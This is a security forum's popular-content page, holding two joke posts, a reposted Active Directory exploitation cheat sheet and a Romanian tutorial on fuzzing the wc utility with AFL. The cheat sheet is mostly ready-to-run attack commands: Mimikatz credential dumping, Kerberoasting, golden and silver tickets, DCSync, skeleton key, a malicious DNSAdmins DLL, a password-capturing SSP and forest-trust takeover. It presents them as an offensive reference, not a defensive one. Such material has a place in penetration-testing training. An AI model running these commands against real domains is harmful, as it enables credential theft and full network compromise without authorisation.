Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/23/23 in all areas

  1. Neaoş, mai ales cu prelungitorul de santier. GovITHub, ION, prize incastrate in pardosea, vise.
    1 point
  2. sa faca rebrand cu numele: neaIon
    1 point
  3. Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. This cheat sheet is inspired by the PayloadAllTheThings repo. Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalation Lateral Movement Powershell Remoting Remote Code Execution with PS Credentials Import a powershell module and execute its functions remotely Executing Remote Stateful commands Mimikatz & Invoke-Mimikatz Useful Tools Domain Privilege Escalation Kerberoast ASREPRoast Password Spray Attack Force Set SPN Abusing Shadow Copies List and Decrypt Stored Credentials Unconstrained Delegation Constrained Delegation Resource Based Constrained Delegation DNSAdmins Abuse Abusing Active Directory-Integraded DNS Abusing Backup Operators Group Abusing Exchange Weaponizing Printer Bug Abusing ACLs Abusing IPv6 with mitm6 SID History Abuse Domain Persistence Golden Ticket Attack DCsync Attack Silver Ticket Attack Skeleton Key Attack DSRM Abuse Custom SSP Cross Forest Attacks Trust Tickets Abuse MSSQL Servers Breaking Forest Trusts Tools Powersploit PowerUpSQL Powermad Impacket Mimikatz Rubeus -> Compiled Version BloodHound AD Module ASREPRoast Enumeration Using PowerView Get Current Domain: Get-NetDomain Enum Other Domains: Get-NetDomain -Domain <DomainName> Get Domain SID: Get-DomainSID Get Domain Policy: Get-DomainPolicy #Will show us the policy configurations of the Domain about system access or kerberos (Get-DomainPolicy)."system access" (Get-DomainPolicy)."kerberos policy" Get Domain Controlers: Get-NetDomainController Get-NetDomainController -Domain <DomainName> Enumerate Domain Users: Get-NetUser Get-NetUser -SamAccountName <user> Get-NetUser | select cn Get-UserProperty #Check last password change Get-UserProperty -Properties pwdlastset #Get a spesific "string" on a user's attribute Find-UserField -SearchField Description -SearchTerm "wtver" #Enumerate user logged on a machine Get-NetLoggedon -ComputerName <ComputerName> #Enumerate Session Information for a machine Get-NetSession -ComputerName <ComputerName> Enum Domain Computers: Get-NetComputer -FullData Get-DomainGroup #Enumerate Live machines Get-NetComputer -Ping Enum Interesting Group Members: Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName> Enumerate Shares #Enumerate Domain Shares Find-DomainShare #Enumerate Domain Shares the current user has access Find-DomainShare -CheckShareAccess Enum Group Policies: Get-NetGPO # Shows active Policy on specified machine Get-NetGPO -ComputerName <Name of the PC> Get-NetGPOGroup #Get users that are part of a Machine's local Admin group Find-GPOComputerAdmin -ComputerName <ComputerName> Enum OUs: Get-NetOU -FullData Get-NetGPO -GPOname <The GUID of the GPO> Enum ACLs: # Returns the ACLs associated with the specified account Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose #Search for interesting ACEs Invoke-ACLScanner -ResolveGUIDs #Check the ACLs associated with a specified path (e.g smb share) Get-PathAcl -Path "\\Path\Of\A\Share" Enum Domain Trust: Get-NetDomainTrust Get-NetDomainTrust -Domain <DomainName> Enum Forest Trust: Get-NetForestDomain Get-NetForestDomain Forest <ForestName> #Domains of Forest Enumeration Get-NetForestDomain Get-NetForestDomain Forest <ForestName> #Map the Trust of the Forest Get-NetForestTrust Get-NetDomainTrust -Forest <ForestName> User Hunting: #Finds all machines on the current domain where the current user has local admin access Find-LocalAdminAccess -Verbose #Find local admins on all machines of the domain: Invoke-EnumerateLocalAdmin -Verbose #Find computers were a Domain Admin OR a spesified user has a session Invoke-UserHunter Invoke-UserHunter -GroupName "RDPUsers" Invoke-UserHunter -Stealth #Confirming admin access: Invoke-UserHunter -CheckAccess ❗ Priv Esc to Domain Admin with User Hunting: I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit! PowerView 3.0 Tricks Using AD Module Get Current Domain: Get-ADDomain Enum Other Domains: Get-ADDomain -Identity <Domain> Get Domain SID: Get-DomainSID Get Domain Controlers: Get-ADDomainController Get-ADDomainController -Identity <DomainName> Enumerate Domain Users: Get-ADUser -Filter * -Identity <user> -Properties * #Get a spesific "string" on a user's attribute Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description Enum Domain Computers: Get-ADComputer -Filter * -Properties * Get-ADGroup -Filter * Enum Domain Trust: Get-ADTrust -Filter * Get-ADTrust -Identity <DomainName> Enum Forest Trust: Get-ADForest Get-ADForest -Identity <ForestName> #Domains of Forest Enumeration (Get-ADForest).Domains Using BloodHound #Using exe ingestor .\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile> #Using powershell module ingestor . .\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile> Useful Enumeration Tools ldapdomaindump Information dumper via LDAP adidnsdump Integrated DNS dumping by any authenticated user ACLight Advanced Discovery of Privileged Accounts Local Privilege Escalation PowerUp Misconfiguration Abuse BeRoot General Priv Esc Enumeration Tool Privesc General Priv Esc Enumeration Tool FullPowers Restore A Service Account's Privileges Juicy Potato Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation ⚠️ Works only until Windows Server 2016 and Windows 10 until patch 1803 Lovely Potato Automated Juicy Potato ⚠️ Works only until Windows Server 2016 and Windows 10 until patch 1803 PrintSpoofer Exploit the PrinterBug for System Impersonation 🙏 Works for Windows Server 2019 and Windows 10 RogueWinRM Exploit the BITS Service for System Impersonation ⚠️ Works only if the service of WinRM doesn't run. Abusing Token Privileges Lateral Movement Powershell Remoting #Enable Powershell Remoting on current Machine (Needs Admin Access) Enable-PSRemoting #Entering or Starting a new PSSession (Needs Admin Access) $sess = New-PSSession -ComputerName <Name> Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName> Remote Code Execution with PS Credentials $SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword) Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami} Import a powershell module and execute its functions remotely #Execute the command and start a session Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess #Interact with the session Enter-PSSession -Session $sess Executing Remote Stateful commands #Create a new session $sess = New-PSSession -ComputerName <NameOfComputer> #Execute command on the session Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process} #Check the result of the command to confirm we have an interactive session Invoke-Command -Session $sess -ScriptBlock {$ps} Mimikatz & Invoke-Mimikatz #Dump credentials: Invoke-Mimikatz -DumpCreds #Dump credentials in remote machines: Invoke-Mimikatz -DumpCreds -ComputerName <ComputerName> #Execute classic mimikatz commands: Invoke-Mimikatz -Command '"sekrlusa::<ETC ETC>"' Detailed Mimikatz Guide Useful Tools Powercat netcat written in powershell, and provides tunneling, relay and portforward capabilities. SCShell fileless lateral movement tool that relies on ChangeServiceConfigA to run command Evil-Winrm the ultimate WinRM shell for hacking/pentesting RunasCs Csharp and open version of windows builtin runas.exe Domain Privilege Escalation Kerberoast PowerView: #Get User Accounts that are used as Service Accounts Get-NetUser -SPN #Get every available SPN account, request a TGS and dump its hash Invoke-Kerberoast #Requesting the TGS for a single account: Request-SPNTicket #Export all tickets using Mimikatz Invoke-Mimikatz -Command '"kerberos::list /export"' AD Module: #Get User Accounts that are used as Service Accounts Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName Impacket: python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName> ASREPRoast PowerView: Get-DomainUser -PreauthNotRequired -Verbose AD Module: Get-ADUser -Filter {DoesNoteRequirePreAuth -eq $True} -Properties DoesNoteRequirePreAuth Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more! Check for interesting permissions on accounts: Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable! PowerView: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} Disable Kerberos Preauth: Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose Check if the value changed: Get-DomainUser -PreauthNotRequired -Verbose And finally execute the attack using the ASREPRoast tool. #Get a spesific Accounts hash: Get-ASREPHash -UserName <UserName> -Verbose #Get any ASREPRoastable Users hashes: Invoke-ASREPRoast -Verbose Using Rubeus: #Trying the attack for all domain users .\Rubeus.exe asreproast /outfile:<NameOfTheFile> Using Impacket: #Trying the attack for the specified users on the file python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName> Password Spray Attack If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse on other domain accounts. Tools: DomainPasswordSpray CrackMapExec SharpHose Spray Force Set SPN WUT IS DIS ?: If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it. PowerView: #Check for interesting permissions on accounts: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} #Check if current user has already an SPN setted: Get-DomainUser -Identity <UserName> | select serviceprincipalname #Force set the SPN on the account: Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'} AD Module: #Check if current user has already an SPN setted Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName #Force set the SPN on the account: Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'} Finally use any tool from before to grab the hash and kerberoast it! Abusing Shadow Copies If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. #List shadow copies using vssadmin (Needs Admnistrator Access) vssadmin list shadows #List shadow copies using diskshadow diskshadow list shadows all #Make a symlink to the shadow copy and access it mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ You can dump the backuped SAM database and harvest credentials. Look for DPAPI stored creds and decrypt them. Access backuped sensitive files. List and Decrypt Stored Credentials DPAPI all the things Unconstrained Delegation WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him! Using PowerView: #Discover domain joined computers that have Unconstrained Delegation enabled Get-NetComputer -UnConstrained #List tickets and check if a DA or some High Value target has stored its TGT Invoke-Mimikatz -Command '"sekurlsa::tickets"' #Command to monitor any incoming sessions on our compromised server Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay <WaitInterval> -Verbose #Dump the tickets to disk: Invoke-Mimikatz -Command '"sekurlsa::tickets /export"' #Impersonate the user using ptt attack: Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"' Note: We can also use Rubeus! Constrained Delegation Using PowerView and Kekeo: #Enumerate Users and Computers with constrained delegation Get-DomainUser -TrustedToAuth Get-DomainComputer -TrustedToAuth #If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser> #Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN> #Finally use mimikatz to ptt the TGS Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"' ALTERNATIVE: Using Rubeus: Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<UserToImpersonate> /msdsspn:"<Service's SPN>" /altservice:<Optional> /ptt Now we can access the service as the impersonated user! 🚩 If we have a machine account with Constrained Delegation: We can do the same steps as before, but insted of a user account we can use the machine's account! A nice misconfiguration is that even if we have only specified service that the machine account is allowed to delegate to, we can delegate to any service that "uses" this machine account! For example if the machine account is trusted to telegate to the DC for the "time" service, we are able to use any service we want -> ldap, cifs etc! That is super important and abusive, since if i can use ldap on DC i can DCsync impersonating the Domain Admnistrator! Resource Based Constrained Delegation WUT IS DIS?: TL;DR If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access. Tools we are going to use: PowerView Powermad Rubeus First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc. Exploitation Example: #Import Powermad and use it to create a new MACHINE ACCOUNT . .\Powermad.ps1 New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose #Import PowerView and get the SID of our new created machine account . .\PowerView.ps1 $ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid #Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) #Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose #After that we need to get the RC4 hash of the new machine account's password using Rubeus Rubeus.exe hash /password:'p@ssword!' #And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt #Finally we can access the C$ drive of the target machine dir \\TargetMachine.wtver.domain\C$ Detailed Articles: Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory RESOURCE-BASED CONSTRAINED DELEGATION ABUSE DNSAdmins Abuse WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work. Enumerate the members of the DNSAdmins group: PowerView: Get-NetGroupMember -GroupName "DNSAdmins" AD Module: Get-ADGroupMember -Identiny DNSAdmins Once we found a member of this group we need to compromise it (There are many ways). Then by serving a malicious DLL on a SMB share and configuring the dll usage,we can escalate our privileges: #Using dnscmd: dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll #Restart the DNS Service: sc \\DNSServer stop dns sc \\DNSServer start dns Abusing Active Directory-Integraded DNS Exploiting Active Directory-Integrated DNS ADIDNS Revisited Inveigh Abusing Backup Operators Group WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA. Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow: #Create a .txt file that will contain the shadow copy process script Script ->{ set metadata c:\<PathToSave>metadata.cab set context clientaccessible set context persistent begin backup add volume c: alias mydrive create expose %mydrive% w: } Next we need to access the shadow copy, we may have the SeBackupPrivilege but we cant just simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are going to use this amazing repo: #Importing both dlls from the repo using powershell Import-Module .\SeBackupPrivilegeCmdLets.dll Import-Module .\SeBackupPrivilegeUtils.dll #Checking if the SeBackupPrivilege is enabled Get-SeBackupPrivilege #If it isn't we enable it Set-SeBackupPrivilege #Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite #Dump the SYSTEM hive reg save HKLM\SYSTEM c:\temp\system.hive Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine. Use secretsdump.py from impacket and dump the hashes. Use psexec or another tool of your choice to PTH and get Domain Admin access. Abusing Exchange Abusing Exchange one Api call from DA CVE-2020-0688 PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange Weaponizing Printer Bug Printer Server Bug to Domain Administrator NetNTLMtoSilverTicket Abusing ACLs Escalating privileges with ACLs in Active Directory aclpwn.py Invoke-ACLPwn Abusing IPv6 with mitm6 Compromising IPv4 networks via IPv6 mitm6 SID History Abuse WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of the SID History field on a kerberos TGT ticket, that defines the "extra" security groups and privileges. Exploitation example: #Get the SID of the Current Domain using PowerView Get-DomainSID -Domain current.root.domain.local #Get the SID of the Root Domain using PowerView Get-DomainSID -Domain root.domain.local #Create the Enteprise Admins SID Format: RootDomainSID-519 #Forge "Extra" Golden Ticket using mimikatz kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi #Inject the ticket into memory kerberos::ptt \path\to\ticket\golden.kirbi #List the DC of the Root Domain dir \\dc.root.domain.local\C$ #Or DCsync and dump the hashes using mimikatz lsadump::dcsync /domain:root.domain.local /all Detailed Articles: Kerberos Golden Tickets are Now More Golden A Guide to Attacking Domain Trusts Domain Persistence Golden Ticket Attack #Execute mimikatz on DC as DA to grab krbtgt hash: Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName> #On any machine: Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt: <HashOfkrbtgtAccount> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' DCsync Attack #DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges): Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"' #DCsync using secretsdump.py from impacket with NTLM authentication secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm #DCsync using secretsdump.py from impacket with Kerberos Authentication secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlm Tip: /ptt -> inject ticket on current running session /ticket -> save the ticket on the system for later use Silver Ticket Attack Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<TheTargetMachine> /service: <ServiceType> /rc4:<TheSPN's Account NTLM Hash> /user:<UserToImpersonate> /ptt"' SPN List Skeleton Key Attack #Exploitation Command runned as DA: Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC's FQDN> #Access using the password "mimikatz" Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator DSRM Abuse WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC! #Dump DSRM password (needs DA privs): Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name> #This is a local account, so we can PTH and authenticate! #BUT we need to alter the behaviour of the DSRM account before pth: #Connect on DC: Enter-PSSession -ComputerName <DC's Name> #Alter the Logon behaviour on registry: New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose #If the property already exists: Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose Then just PTH to get local admin access on DC! Custom SSP WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on! From powershell: #Get current Security Package: $packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages' #Append mimilib: $packages += "mimilib" #Change the new packages name Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages #ALTERNATIVE: Invoke-Mimikatz -Command '"misc::memssp"' Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log Cross Forest Attacks Trust Tickets WUT IS DIS ?: If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT. ⚠️ The access we will have will be limited to what our DA account is configured to have on the other Forest! Using Mimikatz: #Dump the trust key Invoke-Mimikatz -Command '"lsadump::trust /patch"' Invoke-Mimikatz -Command '"lsadump::lsa /patch"' #Forge an inter-realm TGT using the Golden Ticket attack Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid: <OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket: <PathToSaveTheGoldenTicket>"' ❗ Tickets -> .kirbi format Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource! Using Rubeus: .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt Abuse MSSQL Servers Enumerate MSSQL Instances: Get-SQLInstanceDomain Check Accessibility as current user: Get-SQLConnectionTestThreaded Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose Gather Information about the instance: Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose Abusing SQL Database Links: WUT IS DIS?: A database link allows a SQL Server to access other resources like other SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also works across Forest Trust! Check for existing Database Links: #Check for existing Database Links: #PowerUpSQL: Get-SQLServerLink -Instace <SPN> -Verbose #MSSQL Query: select * from master..sysservers Then we can use queries to enumerate other links from the linked Database: #Manualy: select * from openquery("LinkedDatabase", 'select * from master..sysservers') #PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests): Get-SQLServerLinkCrawl -Instance <SPN> -Verbose #Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell #Or if it is disabled enable it: EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN" Query execution: Get-SQLServerLinkCrawl -Instace <SPN> -Query "exec master..xp_cmdshell 'whoami'" Breaking Forest Trusts WUT IS DIS?: TL;DR If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest. Tools we are going to use: Rubeus SpoolSample Mimikatz Exploitation example: #Start monitoring for TGTs with rubeus: Rubeus.exe monitor /interval:5 /filteruser:target-dc$ #Execute the printerbug to trigger the force authentication of the target DC to our machine SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local #Get the base64 captured TGT from Rubeus and inject it into memory: Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket> #Dump the hashes of the target domain using mimikatz: lsadump::dcsync /domain:external.forest.local /all Detailed Articles: Not A Security Boundary: Breaking Forest Trusts Hunting in Active Directory: Unconstrained Delegation & Forests Trusts Sursa: https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet
    1 point
  4. Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. - In timpul acestui tutorial mi-am dat seama ca mai am nevoie de pachetele po4a, libtool, texi2html. sudo apt install po4a libtool texi2html Folosesc American Fuzzy Lop (afl). - http://lcamtuf.coredump.cx/afl/' $ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz $ tar xf afl-latest.tgz $ cd afl-2.39b/ $ make $ sudo make install Ca să vedeți dacă s-a intalat cu succes puteți verifica tastând afl-gcc $ afl-gcc afl-cc 2.39b by <lcamtuf@google.com> This is a helper application for afl-fuzz. It serves as a drop-in replacement for gcc or clang, letting you recompile third-party code with the required runtime instrumentation. A common use pattern would be one of the following: CC=/usr/local/bin/afl-gcc ./configure CXX=/usr/local/bin/afl-g++ ./configure You can specify custom next-stage toolchain via AFL_CC, AFL_CXX, and AFL_AS. Setting AFL_HARDEN enables hardening optimizations in the compiled code. În principiu acest program se așteaptă ca ținta testată să citească fișiere. Să zicem că vrem să testăm utilitarul "wc" (utilitar care numără linii în linux). man wc .. derulăm până jos cu SHIFT-G .. [..] GNU coreutils 8.25 Bun am aflat că wc face parte din pachetul coreutils. Hai să luam sursa de coreutils și să o compilăm Din moment ce folosesc ubuntu server o caut direct pe repo-urile canonical. O găsesc aici $ wget http://archive.ubuntu.com/ubuntu/pool/main/c/coreutils/coreutils_8.25.orig.tar.xz $ tar xf coreutils_8.25.orig.tar.xz $ cd coreutils-8.25/ $ CC=afl-gcc ./configure $ make Bun. Acum am compilat utilitarul pe care vrem sa il testam cu afl-gcc. Hai să verificăm dacă chiar au fost adăugate simbolurile fuzzerului. $ cd src/ $ strings ./wc | grep -i afl [..] __afl_fork_pid .AFL_VARS __afl_global_area_ptr Totul e în regulă deci. Hai să verificăm că programul nostru chiar merge. $ ./wc /etc/passwd 33 48 1740 /etc/passwd Fuzzerul are nevoie de două foldere. Unul pentru input altrul pentru output. $ mkdir in/ $ mkdir out/ $ echo "test" > in/input $ echo "test2" >> in/input # testam $ ./wc in/input 2 2 11 in/input Acum hai să pornim o rulare. $ afl-fuzz -i in/ -o out/ ./wc @@ american fuzzy lop 2.39b (wc) lq process timing qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqwq overall results qqqqqk x run time : 0 days, 0 hrs, 0 min, 5 sec x cycles done : 0 x x last new path : 0 days, 0 hrs, 0 min, 2 sec x total paths : 58 x x last uniq crash : none seen yet x uniq crashes : 0 x x last uniq hang : none seen yet x uniq hangs : 0 x tq cycle progress qqqqqqqqqqqqqqqqqqqqwq map coverage qvqqqqqqqqqqqqqqqqqqqqqqqu x now processing : 0 (0.00%) x map density : 0.23% / 0.25% x x paths timed out : 0 (0.00%) x count coverage : 1.92 bits/tuple x tq stage progress qqqqqqqqqqqqqqqqqqqqnq findings in depth qqqqqqqqqqqqqqqqqqqqu x now trying : havoc x favored paths : 1 (1.72%) x x stage execs : 21.6k/32.8k (65.87%) x new edges on : 8 (13.79%) x x total execs : 23.7k x total crashes : 0 (0 unique) x x exec speed : 3591/sec x total hangs : 0 (0 unique) x tq fuzzing strategy yields qqqqqqqqqqqvqqqqqqqqqqqqqqqwq path geometry qqqqqqqqu x bit flips : 8/88, 1/87, 1/85 x levels : 2 x x byte flips : 0/11, 1/10, 4/8 x pending : 58 x x arithmetics : 1/616, 0/75, 0/0 x pend fav : 1 x x known ints : 0/62, 3/280, 3/352 x own finds : 57 x x dictionary : 0/0, 0/0, 0/0 x imported : n/a x x havoc : 0/0, 0/0 x stability : 100.00% x x trim : 0.00%/2, 0.00% tqqqqqqqqqqqqqqqqqqqqqqqqj ^Cqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqj [cpu000: 44%] O să găsiți inputurile care crapă programul în ./out/crashes și cele care îl blochează în ./out/hangs. Have fun
    1 point
×
×
  • Create New...